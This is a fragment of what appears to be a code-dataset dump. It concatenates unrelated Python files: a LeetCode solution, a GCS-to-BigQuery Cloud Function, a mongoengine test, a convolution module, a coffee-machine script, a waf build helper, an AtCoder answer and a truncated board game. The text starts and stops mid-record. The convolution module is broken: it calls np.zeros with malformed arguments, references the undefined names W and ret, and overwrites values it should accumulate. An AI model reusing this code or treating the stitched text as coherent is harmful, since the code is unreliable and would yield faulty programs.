encoding=\"utf-8\") as f:\n\t\tusers = f.read()\n\n\tusers = users.split(\"\\n\")\n\n\treturn users[:-1]\n\n\ndef get_buyers(file=\"pays_base.txt\"):\n\twith open(file, \"r\", encoding=\"utf-8\") as f:\n\t\tusers = f.read()\n\n\tusers = users.split(\"\\n\")\n\n\treturn users[:-1]\n\n\t","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"468271355","text":"class Solution:\n def mostCommonWord0(self, paragraph, banned):\n paragraph = paragraph.lower()\n paragraph += '.'\n d = dict()\n st = \"\"\n for ch in paragraph:\n if 'a' <= ch <= 'z':\n st = st + ch\n else:\n if st:\n if st in d:\n d[st] += 1\n else:\n d[st] = 1\n st = \"\"\n\n max_count = 0\n res = \"\"\n for k, v in d.items():\n if k not in banned and v > max_count:\n max_count = v\n res = k\n\n return res\n\n def mostCommonWord(self, paragraph, banned):\n banset = set(banned)\n import collections\n count = collections.Counter(\n word.strip(\"!?',;.\") for word in paragraph.lower().split())\n\n ans, best = '', 0\n for word in count:\n if count[word] > best and word not in banset:\n ans, best = word, count[word]\n\n return ans\n","sub_path":"Solutions/819. Most Common Word/819.py","file_name":"819.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"266027192","text":"# Copyright 2020 Google LLC.\n# This software is provided as-is, without warranty or representation\n# for any use or purpose.\n# Your use of it is subject to your agreement with Google.\n\n# Licensed under the Apache License, Version 2.0 (the 'License');\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an 'AS IS' BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Background Cloud Function for loading data from GCS to BigQuery.\n\"\"\"\nimport collections\nimport collections.abc\nimport copy\nimport json\nimport os\nimport pathlib\nimport re\nimport time\nfrom typing import Any, Deque, Dict, List, Optional, Tuple\n\nimport cachetools\nimport google.api_core.client_info\nimport google.api_core.exceptions\nimport google.cloud.exceptions\nfrom google.cloud import bigquery, storage\n\n# https://cloud.google.com/bigquery/quotas#load_jobs\n# 15TB per BQ load job (soft limit).\nDEFAULT_MAX_BATCH_BYTES = str(15 * 10**12)\n# 10,000 GCS URIs per BQ load job.\nMAX_SOURCE_URIS_PER_LOAD = 10**4\n\nDEFAULT_EXTERNAL_TABLE_DEFINITION = {\n # The default must be a self describing data format\n # because autodetecting CSV /JSON schemas is likely to not match\n # expectations / assumptions of the transformation query.\n \"sourceFormat\": \"PARQUET\",\n}\n\nDEFAULT_JOB_LABELS = {\n \"component\": \"event-based-gcs-ingest\",\n \"cloud-function-name\": os.getenv(\"FUNCTION_NAME\"),\n}\n\nBASE_LOAD_JOB_CONFIG = {\n \"sourceFormat\": \"CSV\",\n \"fieldDelimiter\": \",\",\n \"writeDisposition\": \"WRITE_APPEND\",\n \"labels\": DEFAULT_JOB_LABELS,\n}\n\n# yapf: disable\nDEFAULT_DESTINATION_REGEX = (\n r\"^(?P[\\w\\-\\._0-9]+)/\" # dataset (required)\n r\"(?P[\\w\\-_0-9]+)/?\" # table name (required)\n r\"(?P\\$[0-9]+)?/?\" # partition decorator (optional)\n r\"(?P[0-9]{4})?/?\" # partition year (yyyy) (optional)\n r\"(?P[0-9]{2})?/?\" # partition month (mm) (optional)\n r\"(?P
[0-9]{2})?/?\" # partition day (dd) (optional)\n r\"(?P[0-9]{2})?/?\" # partition hour (hh) (optional)\n r\"(?P[\\w\\-_0-9]+)?/\" # batch id (optional)\n)\n# yapf: enable\n\n# Will wait up to this polling for errors before exiting\n# This is to check if job fail quickly, not to assert it succeed.\n# This may not be honored if longer than cloud function timeout.\n# https://cloud.google.com/functions/docs/concepts/exec#timeout\n# One might consider lowering this to 1-2 seconds to lower the\n# upper bound of expected execution time to stay within the free tier.\n# https://cloud.google.com/functions/pricing#free_tier\nWAIT_FOR_JOB_SECONDS = int(os.getenv(\"WAIT_FOR_JOB_SECONDS\", \"5\"))\n\n# Use caution when lowering the job polling rate.\n# Keep in mind that many concurrent executions of this cloud function should not\n# violate the 300 concurrent requests or 100 request per second.\n# https://cloud.google.com/bigquery/quotas#all_api_requests\nJOB_POLL_INTERVAL_SECONDS = 1\n\nSUCCESS_FILENAME = os.getenv(\"SUCCESS_FILENAME\", \"_SUCCESS\")\n\nCLIENT_INFO = google.api_core.client_info.ClientInfo(\n user_agent=\"google-pso-tool/bq-severless-loader\")\n\nDEFAULT_JOB_PREFIX = \"gcf-ingest-\"\n\n\ndef main(event: Dict, context): # pylint: disable=unused-argument\n \"\"\"entry point for background cloud function for event driven GCS to\n BigQuery ingest.\"\"\"\n # pylint: disable=too-many-locals\n # Set by Cloud Function Execution Environment\n # https://cloud.google.com/functions/docs/env-var\n destination_regex = os.getenv(\"DESTINATION_REGEX\",\n DEFAULT_DESTINATION_REGEX)\n dest_re = re.compile(destination_regex)\n\n bucket_id, object_id = parse_notification(event)\n\n # Exit eagerly if not a success file.\n # we can improve this with pub/sub message filtering once it supports\n # a hasSuffix filter function (we can filter on hasSuffix successfile name)\n # https://cloud.google.com/pubsub/docs/filtering\n if not object_id.endswith(f\"/{SUCCESS_FILENAME}\"):\n print(\n f\"No-op. This notification was not for a {SUCCESS_FILENAME} file.\")\n return\n\n prefix_to_load = removesuffix(object_id, SUCCESS_FILENAME)\n gsurl = f\"gs://{bucket_id}/{prefix_to_load}\"\n gcs_client = storage.Client(client_info=CLIENT_INFO)\n project = gcs_client.project\n bkt = cached_get_bucket(gcs_client, bucket_id)\n success_blob: storage.Blob = bkt.blob(object_id)\n handle_duplicate_notification(bkt, success_blob, gsurl)\n\n destination_match = dest_re.match(object_id)\n if not destination_match:\n raise RuntimeError(f\"Object ID {object_id} did not match regex:\"\n f\" {destination_regex}\")\n destination_details = destination_match.groupdict()\n try:\n dataset = destination_details['dataset']\n table = destination_details['table']\n except KeyError:\n raise RuntimeError(\n f\"Object ID {object_id} did not match dataset and table in regex:\"\n f\" {destination_regex}\") from KeyError\n partition = destination_details.get('partition')\n year, month, day, hour = (\n destination_details.get(key, \"\") for key in ('yyyy', 'mm', 'dd', 'hh'))\n part_list = (year, month, day, hour)\n if not partition and any(part_list):\n partition = '$' + ''.join(part_list)\n batch_id = destination_details.get('batch')\n labels = DEFAULT_JOB_LABELS\n labels[\"bucket\"] = bucket_id\n\n if batch_id:\n labels[\"batch-id\"] = batch_id\n\n if partition:\n dest_table_ref = bigquery.TableReference.from_string(\n f\"{dataset}.{table}{partition}\", default_project=project)\n else:\n dest_table_ref = bigquery.TableReference.from_string(\n f\"{dataset}.{table}\", default_project=project)\n\n default_query_config = bigquery.QueryJobConfig()\n default_query_config.use_legacy_sql = False\n default_query_config.labels = labels\n bq_client = bigquery.Client(client_info=CLIENT_INFO,\n default_query_job_config=default_query_config)\n\n print(\"looking for bq_transform.sql\")\n external_query_sql = read_gcs_file_if_exists(\n gcs_client, f\"{gsurl}_config/bq_transform.sql\")\n if not external_query_sql:\n external_query_sql = look_for_config_in_parents(gcs_client, gsurl,\n \"bq_transform.sql\")\n if external_query_sql:\n print(\"EXTERNAL QUERY\")\n print(f\"found external query:\\n{external_query_sql}\")\n external_query(gcs_client, bq_client, gsurl, external_query_sql,\n dest_table_ref,\n create_job_id_prefix(dest_table_ref, batch_id))\n return\n\n print(\"LOAD_JOB\")\n load_batches(gcs_client, bq_client, gsurl, dest_table_ref,\n create_job_id_prefix(dest_table_ref, batch_id))\n\n\ndef create_job_id_prefix(dest_table_ref: bigquery.TableReference,\n batch_id: Optional[str]):\n \"\"\"Create job id prefix with a consistent naming convention.\n The naming conventions is as follows:\n gcf-ingest-----\n Parts that are not inferrable from the GCS path with have a 'None'\n placeholder. This naming convention is crucial for monitoring the system.\n Note, gcf-ingest- can be overridden with environment variable JOB_PREFIX\n\n Examples:\n\n Non-partitioned Non batched tables:\n - gs://${BUCKET}/tpch/lineitem/_SUCCESS\n - gcf-ingest-tpch-lineitem-None-None-\n Non-partitioned batched tables:\n - gs://${BUCKET}/tpch/lineitem/batch000/_SUCCESS\n - gcf-ingest-tpch-lineitem-None-batch000-\n Partitioned Batched tables:\n - gs://${BUCKET}/tpch/lineitem/$20201031/batch000/_SUCCESS\n - gcf-ingest-tpch-lineitem-20201031-batch000-\n \"\"\"\n table_partition = dest_table_ref.table_id.split(\"$\")\n if len(table_partition) < 2:\n # If there is no partition put a None placeholder\n table_partition.append(\"None\")\n return f\"{os.getenv('JOB_PREFIX', DEFAULT_JOB_PREFIX)}\" \\\n f\"{dest_table_ref.dataset_id}-\" \\\n f\"{'-'.join(table_partition)}-\" \\\n f\"{batch_id}-\"\n\n\ndef external_query( # pylint: disable=too-many-arguments\n gcs_client: storage.Client, bq_client: bigquery.Client, gsurl: str,\n query: str, dest_table_ref: bigquery.TableReference,\n job_id_prefix: str):\n \"\"\"Load from query over external table from GCS.\n\n This hinges on a SQL query defined in GCS at _config/bq_transform.sql and\n an external table definition _config/external.json (otherwise will assume\n CSV external table)\n \"\"\"\n external_table_config = read_gcs_file_if_exists(\n gcs_client, f\"{gsurl}_config/external.json\")\n if not external_table_config:\n external_table_config = look_for_config_in_parents(\n gcs_client, gsurl, \"external.json\")\n if external_table_config:\n external_table_def = json.loads(external_table_config)\n else:\n print(f\"Falling back to default CSV external table.\"\n f\" {gsurl}_config/external.json not found.\")\n external_table_def = DEFAULT_EXTERNAL_TABLE_DEFINITION\n\n external_table_def[\"sourceUris\"] = flatten2dlist(\n get_batches_for_prefix(gcs_client, gsurl))\n print(f\"external table def = {json.dumps(external_table_config, indent=2)}\")\n external_config = bigquery.ExternalConfig.from_api_repr(external_table_def)\n job_config = bigquery.QueryJobConfig(\n table_definitions={\"temp_ext\": external_config}, use_legacy_sql=False)\n\n # Note, dest_table might include a partition decorator.\n rendered_query = query.format(\n dest_dataset=dest_table_ref.dataset_id,\n dest_table=dest_table_ref.table_id,\n )\n\n job: bigquery.QueryJob = bq_client.query(\n rendered_query,\n job_config=job_config,\n job_id_prefix=job_id_prefix,\n )\n\n print(f\"started asynchronous query job: {job.job_id}\")\n\n start_poll_for_errors = time.monotonic()\n # Check if job failed quickly\n while time.monotonic() - start_poll_for_errors < WAIT_FOR_JOB_SECONDS:\n job.reload()\n if job.errors:\n msg = f\"query job {job.job_id} failed quickly: {job.errors}\"\n for err in job.errors:\n # BQ gives confusing warning about missing dataset if the\n # external query refers to the wrong external table name.\n # In this case we can give the end user a little more context.\n if \"missing dataset\" in err.get(\"message\", \"\"):\n raise RuntimeError(\n \"External queries must select from the external table \"\n \"named 'temp_ext'. This error may be due to specifying\"\n \"the wrong name for the external table. \" + msg)\n raise RuntimeError(msg)\n time.sleep(JOB_POLL_INTERVAL_SECONDS)\n\n\ndef flatten2dlist(arr: List[List[Any]]) -> List[Any]:\n \"\"\"Flatten list of lists to flat list of elements\"\"\"\n return [j for i in arr for j in i]\n\n\ndef load_batches(gcs_client, bq_client, gsurl, dest_table_ref, job_id_prefix):\n \"\"\"orchestrate 1 or more load jobs based on number of URIs and total byte\n size of objects at gsurl\"\"\"\n batches = get_batches_for_prefix(gcs_client, gsurl)\n load_config = construct_load_job_config(gcs_client, gsurl)\n load_config.labels = DEFAULT_JOB_LABELS\n batch_count = len(batches)\n\n jobs: List[bigquery.LoadJob] = []\n for batch_num, batch in enumerate(batches):\n print(load_config.to_api_repr())\n job: bigquery.LoadJob = bq_client.load_table_from_uri(\n batch,\n dest_table_ref,\n job_config=load_config,\n job_id_prefix=f\"{job_id_prefix}{batch_num}-of-{batch_count}-\",\n )\n\n print(f\"started asyncronous bigquery load job with id: {job.job_id} for\"\n f\" {gsurl}\")\n jobs.append(job)\n\n start_poll_for_errors = time.monotonic()\n # Check if job failed quickly\n while time.monotonic() - start_poll_for_errors < WAIT_FOR_JOB_SECONDS:\n # Check if job failed quickly\n for job in jobs:\n job.reload()\n if job.errors:\n raise RuntimeError(\n f\"load job {job.job_id} failed quickly: {job.errors}\")\n time.sleep(JOB_POLL_INTERVAL_SECONDS)\n\n\ndef handle_duplicate_notification(bkt: storage.Bucket,\n success_blob: storage.Blob, gsurl: str):\n \"\"\"\n Need to handle potential duplicate Pub/Sub notifications.\n To achieve this we will drop an empty \"claimed\" file that indicates\n an invocation of this cloud function has picked up the success file\n with a certain creation timestamp. This will support republishing the\n success file as a mechanism of re-running the ingestion while avoiding\n duplicate ingestion due to multiple Pub/Sub messages for a success file\n with the same creation time.\n \"\"\"\n success_blob.reload()\n success_created_unix_timestamp = success_blob.time_created.timestamp()\n\n claim_blob: storage.Blob = bkt.blob(\n success_blob.name.replace(SUCCESS_FILENAME,\n f\"_claimed_{success_created_unix_timestamp}\"))\n try:\n claim_blob.upload_from_string(\"\", if_generation_match=0)\n except google.api_core.exceptions.PreconditionFailed as err:\n raise RuntimeError(\n f\"The prefix {gsurl} appears to already have been claimed for \"\n f\"{gsurl}{SUCCESS_FILENAME} with created timestamp\"\n f\"{success_created_unix_timestamp}.\"\n \"This means that another invocation of this cloud function has\"\n \"claimed the ingestion of this batch.\"\n \"This may be due to a rare duplicate delivery of the Pub/Sub \"\n \"storage notification.\") from err\n\n\ndef _get_parent_config_file(storage_client, config_filename, bucket, path):\n config_dir_name = \"_config\"\n parent_path = pathlib.Path(path).parent\n config_path = parent_path / config_dir_name / config_filename\n return read_gcs_file_if_exists(storage_client,\n f\"gs://{bucket}/{config_path}\")\n\n\ndef look_for_config_in_parents(storage_client: storage.Client, gsurl: str,\n config_filename: str) -> Optional[str]:\n \"\"\"look in parent directories for _config/config_filename\"\"\"\n blob: storage.Blob = storage.Blob.from_string(gsurl)\n bucket_name = blob.bucket.name\n obj_path = blob.name\n parts = removesuffix(obj_path, \"/\").split(\"/\")\n\n def _get_parent_query(path):\n return _get_parent_config_file(storage_client, config_filename,\n bucket_name, path)\n\n config = None\n while parts:\n if config:\n return config\n config = _get_parent_query(\"/\".join(parts))\n parts.pop()\n return config\n\n\ndef construct_load_job_config(storage_client: storage.Client,\n gsurl: str) -> bigquery.LoadJobConfig:\n \"\"\"\n merge dictionaries for loadjob.json configs in parent directories.\n The configs closest to gsurl should take precedence.\n \"\"\"\n config_filename = \"load.json\"\n blob: storage.Blob = storage.Blob.from_string(gsurl)\n bucket_name = blob.bucket.name\n obj_path = blob.name\n parts = removesuffix(obj_path, \"/\").split(\"/\")\n\n def _get_parent_config(path):\n return _get_parent_config_file(storage_client, config_filename,\n bucket_name, path)\n\n config_q: Deque[Dict[str, Any]] = collections.deque()\n config_q.append(BASE_LOAD_JOB_CONFIG)\n while parts:\n config = _get_parent_config(\"/\".join(parts))\n if config:\n config_q.append(json.loads(config))\n parts.pop()\n\n merged_config: Dict = {}\n while config_q:\n recursive_update(merged_config, config_q.popleft(), in_place=True)\n print(f\"merged_config: {merged_config}\")\n return bigquery.LoadJobConfig.from_api_repr({\"load\": merged_config})\n\n\ndef get_batches_for_prefix(gcs_client: storage.Client,\n prefix_path: str,\n ignore_subprefix=\"_config/\",\n ignore_file=SUCCESS_FILENAME) -> List[List[str]]:\n \"\"\"\n This function creates batches of GCS uris for a given prefix.\n This prefix could be a table prefix or a partition prefix inside a\n table prefix.\n returns an Array of their batches\n (one batch has an array of multiple GCS uris)\n \"\"\"\n batches = []\n blob: storage.Blob = storage.Blob.from_string(prefix_path)\n bucket_name = blob.bucket.name\n prefix_name = blob.name\n\n prefix_filter = f\"{prefix_name}\"\n bucket = cached_get_bucket(gcs_client, bucket_name)\n blobs = list(bucket.list_blobs(prefix=prefix_filter, delimiter=\"/\"))\n\n cumulative_bytes = 0\n max_batch_size = int(os.getenv(\"MAX_BATCH_BYTES\", DEFAULT_MAX_BATCH_BYTES))\n batch: List[str] = []\n for blob in blobs:\n # API returns root prefix also. Which should be ignored.\n # Similarly, the _SUCCESS file should be ignored.\n # Finally, anything in the _config/ prefix should be ignored.\n if (blob.name\n not in {f\"{prefix_name}/\", f\"{prefix_name}/{ignore_file}\"}\n or blob.name.startswith(f\"{prefix_name}/{ignore_subprefix}\")):\n if blob.size == 0: # ignore empty files\n print(f\"ignoring empty file: gs://{bucket}/{blob.name}\")\n continue\n cumulative_bytes += blob.size\n\n # keep adding until we reach threshold\n if cumulative_bytes <= max_batch_size or len(\n batch) > MAX_SOURCE_URIS_PER_LOAD:\n batch.append(f\"gs://{bucket_name}/{blob.name}\")\n else:\n batches.append(batch.copy())\n batch.clear()\n batch.append(f\"gs://{bucket_name}/{blob.name}\")\n cumulative_bytes = blob.size\n\n # pick up remaining files in the final batch\n if len(batch) > 0:\n batches.append(batch.copy())\n batch.clear()\n\n if len(batches) > 1:\n print(f\"split into {len(batches)} load jobs.\")\n elif len(batches) == 1:\n print(\"using single load job.\")\n else:\n raise RuntimeError(\"No files to load!\")\n return batches\n\n\ndef parse_notification(notification: dict) -> Tuple[str, str]:\n \"\"\"valdiates notification payload\n Args:\n notification(dict): Pub/Sub Storage Notification\n https://cloud.google.com/storage/docs/pubsub-notifications\n Or Cloud Functions direct trigger\n https://cloud.google.com/functions/docs/tutorials/storage\n with notification schema\n https://cloud.google.com/storage/docs/json_api/v1/objects#resource\n Returns:\n tuple of bucketId and objectId attributes\n Raises:\n KeyError if the input notification does not contain the expected\n attributes.\n \"\"\"\n if notification.get(\"kind\") == \"storage#object\":\n # notification is GCS Object reosource from Cloud Functions trigger\n # https://cloud.google.com/storage/docs/json_api/v1/objects#resource\n return notification[\"bucket\"], notification[\"name\"]\n if notification.get(\"attributes\"):\n # notification is Pub/Sub message.\n try:\n attributes = notification[\"attributes\"]\n return attributes[\"bucketId\"], attributes[\"objectId\"]\n except KeyError:\n raise RuntimeError(\n \"Issue with Pub/Sub message, did not contain expected\"\n f\"attributes: 'bucketId' and 'objectId': {notification}\"\n ) from KeyError\n raise RuntimeError(\n \"Cloud Function recieved unexpected trigger:\\n\"\n f\"{notification}\\n\"\n \"This function only supports direct Cloud Functions\"\n \"Background Triggers or Pub/Sub storage notificaitons\"\n \"as described in the following links:\\n\"\n \"https://cloud.google.com/storage/docs/pubsub-notifications\\n\"\n \"https://cloud.google.com/functions/docs/tutorials/storage\")\n\n\n# cache lookups against GCS API for 1 second as buckets / objects have update\n# limit of once per second and we might do several of the same lookup during\n# the functions lifetime. This should improve performance by eliminating\n# unnecessary API calls. The lookups on bucket and objects in this function\n# should not be changing during the function's lifetime as this would lead to\n# non-deterministic results with or without this cache.\n# https://cloud.google.com/storage/quotas\n@cachetools.cached(cachetools.TTLCache(maxsize=1024, ttl=1))\ndef read_gcs_file(gcs_client: storage.Client, gsurl: str) -> str:\n \"\"\"\n Read a GCS object as a string\n\n Args:\n gcs_client: GCS client\n gsurl: GCS URI for object to read in gs://bucket/path/to/object format\n Returns:\n str\n \"\"\"\n blob = storage.Blob.from_string(gsurl)\n return blob.download_as_bytes(client=gcs_client).decode('UTF-8')\n\n\ndef read_gcs_file_if_exists(gcs_client: storage.Client,\n gsurl: str) -> Optional[str]:\n \"\"\"return string of gcs object contents or None if the object does not exist\n \"\"\"\n try:\n return read_gcs_file(gcs_client, gsurl)\n except google.cloud.exceptions.NotFound:\n return None\n\n\n# Cache bucket lookups (see reasoning in comment above)\n@cachetools.cached(cachetools.TTLCache(maxsize=1024, ttl=1))\ndef cached_get_bucket(\n gcs_client: storage.Client,\n bucket_id: str,\n) -> storage.Bucket:\n \"\"\"get storage.Bucket object by bucket_id string if exists or raise\n google.cloud.exceptions.NotFound.\"\"\"\n return gcs_client.get_bucket(bucket_id)\n\n\ndef dict_to_bq_schema(schema: List[Dict]) -> List[bigquery.SchemaField]:\n \"\"\"Converts a list of dicts to list of bigquery.SchemaField for use with\n bigquery client library. Dicts must contain name and type keys.\n The dict may optionally contain a mode key.\"\"\"\n default_mode = \"NULLABLE\"\n return [\n bigquery.SchemaField(\n x[\"name\"],\n x[\"type\"],\n mode=x.get(\"mode\") if x.get(\"mode\") else default_mode)\n for x in schema\n ]\n\n\n# To be added to built in str in python 3.9\n# https://www.python.org/dev/peps/pep-0616/\ndef removesuffix(in_str: str, suffix: str) -> str:\n \"\"\"removes suffix from a string.\"\"\"\n # suffix='' should not call self[:-0].\n if suffix and in_str.endswith(suffix):\n return in_str[:-len(suffix)]\n return in_str[:]\n\n\ndef recursive_update(\n original: Dict,\n update: Dict,\n in_place: bool = False\n):\n \"\"\"\n return a recursively updated dictionary.\n\n Note, lists will be completely overwritten by value in update if there is a\n conflict.\n\n original: (dict) the base dictionary\n update: (dict) the dictionary of updates to apply on original\n in_place: (bool) if true then original will be mutated in place else a new\n dictionary as a result of the update will be returned.\n \"\"\"\n out = original if in_place else copy.deepcopy(original)\n\n for key, value in update.items():\n if isinstance(value, dict):\n out[key] = recursive_update(out.get(key, {}), value)\n else:\n out[key] = value\n return out\n","sub_path":"tools/cloud_functions/gcs_event_based_ingest/gcs_ocn_bq_ingest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"392687638","text":"from mongoengine import *\nfrom schemas import CommentPage, Comment, Reply\n\"\"\"\nSimple test script to check the creation of collections \nand whether the schema is working\n\"\"\"\n\n\nconnect('assignment3db')\ncommentpage1 = CommentPage(file_path='testlink')\ncomment1 = Comment(username = \"Shrujan\", comment_text=\"Yo Yo Yo\", timestamp=\"4:20\")\nreply1 = Reply(username = \"Shrujan\", comment_text=\"Yo Yo Yo\", timestamp=\"4:20\")\n\ncommentpage1.comments.append(comment1)\ncomment1.replies.append(reply1)\n\ncommentpage1.save()\n","sub_path":"Assignment3.2/Portfolio/schemasTest.py","file_name":"schemasTest.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"77866278","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 25 22:34:04 2018\n\n@author: vedanta\n\"\"\"\n\nimport numpy as np\n\ndef convolution(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n \n Y = np.zeros(n1+n2-1,m1+m2-1)\n \n for i in xrange(n1+m1-1):\n for ii in xrange(m1):\n for j in xrange(n2+m2-1):\n for jj in xrange(m2):\n Y[i,j] = H[ii,jj]*X[i-ii,j-jj]\n return Y\n\ndef convolution_vect(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n Y = np.zeros(n1+m1-1,n2+m2,-1)\n for i in xrange(n1):\n for j in xrange(n2):\n Y[i:i+m1,j:j+m2] += X[i,j]*W\n \ndef convolution_same(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n Y = np.zeros(n1+m1-1,n2+m2-1)\n for i in xrange(n1+m1-1):\n for ii in xrange(m1):\n for j in xrange(n2+m2-1):\n for jj in xrange(m2):\n Y[i,j] = H[ii,jj]*X[i-ii,j-jj]\n ret[m1,m2] = Y[m1/2:-m1/2 + 1,m2/2:-m2/2 +1]\n return ret \n \n \n","sub_path":"Basics/Convolution.py","file_name":"Convolution.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"559567325","text":"MENU = {\r\n \"espresso\": {\r\n \"ingredients\": {\r\n \"water\": 50,\r\n \"milk\": 0,\r\n \"coffee\": 18,\r\n },\r\n \"cost\": 1.5,\r\n },\r\n \"latte\": {\r\n \"ingredients\": {\r\n \"water\": 200,\r\n \"milk\": 150,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 2.5,\r\n },\r\n \"cappuccino\": {\r\n \"ingredients\": {\r\n \"water\": 250,\r\n \"milk\": 100,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 3.0,\r\n }\r\n}\r\n\r\nresources = {\r\n \"water\": 300,\r\n \"milk\": 200,\r\n \"coffee\": 100,\r\n \"money\": 0\r\n}\r\n\r\n\r\ndef print_report():\r\n print(f\"Water: {resources['water']}ml\")\r\n print(f\"Milk: {resources['milk']}ml\")\r\n print(f\"Coffee: {resources['coffee']}ml\")\r\n print(f\"Money: ${resources['money']:.2f}\")\r\n\r\n\r\ndef input_coins():\r\n quarters = int(input(\"How many quarters? \"))\r\n dimes = int(input(\"How many dimes? \"))\r\n nickels = int(input(\"How many nickels? \"))\r\n pennies = int(input(\"How many pennies? \"))\r\n return [quarters, dimes, nickels, pennies]\r\n\r\n\r\non = True\r\n\r\nwhile on:\r\n order = input(\"What would you like? (espresso/latte/cappuccino) \")\r\n if order == 'off':\r\n on = False\r\n elif order == 'report':\r\n print_report()\r\n else:\r\n enough = True\r\n for ingredient in [\"water\", \"milk\", \"coffee\"]:\r\n if MENU[order][\"ingredients\"][ingredient] > resources[ingredient]:\r\n enough = False\r\n print(f\"Sorry, there is not enough {ingredient}.\")\r\n break\r\n if enough:\r\n coins = input_coins()\r\n cash = 0.25*coins[0] + 0.1*coins[1] + 0.05*coins[2] + 0.01*coins[3]\r\n if cash < MENU[order][\"cost\"]:\r\n print(\"Sorry, that is not enough money. Money is refunded.\")\r\n else:\r\n if cash > MENU[order][\"cost\"]:\r\n print(f\"Here is your ${cash - MENU[order]['cost']:.2f} change.\")\r\n resources[\"money\"] += MENU[order][\"cost\"]\r\n for ingredient in [\"water\", \"milk\", \"coffee\"]:\r\n resources[ingredient] -= MENU[order][\"ingredients\"][ingredient]\r\n print(f\"Here is your {order}. Enjoy!\")\r\n","sub_path":"Day15-Coffee-Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"482527821","text":"import sys, os\nimport Task, TaskGen\nfrom TaskGen import extension\n\ndef configure(conf):\n conf.find_file('texc.py', var='TEXC', mandatory = True)\n conf.find_file('glslvc', var='GLSLVC', mandatory = True)\n conf.find_file('glslfc', var='GLSLFC', mandatory = True)\n\nTask.simple_task_type('texture', 'python ${TEXC} ${SRC} -o ${TGT}',\n color='PINK',\n after='proto_gen_py',\n before='cc cxx',\n shell=True)\n\n@extension('.png .jpg')\ndef png_file(self, node):\n texture = self.create_task('texture')\n texture.set_inputs(node)\n out = node.change_ext('.texturec')\n texture.set_outputs(out)\n\nTask.simple_task_type('vertexprogram', '${GLSLVC} ${SRC} ${TGT}',\n color='PINK',\n shell=True)\n\n@extension('.vp')\ndef vp_file(self, node):\n obj_ext = '.vpc'\n program = self.create_task('vertexprogram')\n program.set_inputs(node)\n out = node.change_ext(obj_ext)\n program.set_outputs(out)\n\nTask.simple_task_type('fragmentprogram', '${GLSLFC} ${SRC} ${TGT}',\n color='PINK',\n shell=True)\n\n@extension('.fp')\ndef fp_file(self, node):\n obj_ext = '.fpc'\n program = self.create_task('fragmentprogram')\n program.set_inputs(node)\n out = node.change_ext(obj_ext)\n program.set_outputs(out)\n","sub_path":"engine/graphics/src/waf_graphics.py","file_name":"waf_graphics.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"614988220","text":"N, M, A, B = map(int, input().split())\nfor i in range(M):\n if N <= A:\n N += B\n t = int(input())\n N -= t\n if N < 0:\n print(i + 1)\n break\nelse:\n print(\"complete\")","sub_path":"ARC/ARC010/arc010a.py","file_name":"arc010a.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"433345552","text":"# Name: Kyle Bingman\n# Date: 3/8/2020\n# Description: Enables a game of F-Board to be played by two players.\n\nclass FBoard:\n \"\"\"Sets up the board and required moves for a game of F-Board\"\"\"\n\n def __init__(self):\n \"\"\"Establishes and initializes the board and current state of the game\"\"\"\n self._game_board = [[\"x\", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \"o\"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \"o\", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \"o\", \" \", \"o\"]]\n self._game_state = \"UNFINISHED\"\n self._x_location = [0, 0]\n\n def win_check(self):\n \"\"\"Performs Needed Checks to See if the Game Has Been Won\"\"\"\n\n # Generate Allowable X Moves for Later\n x_check_position = self._x_location\n x_move_options = []\n\n # Add 1 to Both\n move_option_win_check = [x + 1 for x in x_check_position]\n x_move_options.append(move_option_win_check)\n\n # Subtract 1 from Both\n move_option_win_check = [x - 1 for x in x_check_position]\n x_move_options.append(move_option_win_check)\n\n # +1 / - 1\n move_option_win_check2 = []\n move_option_win_check2.append(x_check_position[0] + 1)\n move_option_win_check2.append(x_check_position[1] - 1)\n x_move_options.append(move_option_win_check2)\n\n # - 1 / + 1\n move_option_win_check3 = []\n move_option_win_check3.append(x_check_position[0] - 1)\n move_option_win_check3.append(x_check_position[1] + 1)\n x_move_options.append(x_check_position)\n #print(\"Win Check - Allowed X Moves:\", x_move_options)\n\n # Check of X Has Won\n if self._game_board[7][7] == \"x\":\n self._game_state = \"X_WON\"\n return True\n\n # Check if No Legal Moves for X / If O Has Won\n o_checks = []\n x_is_done = 0\n\n # Sees if the X 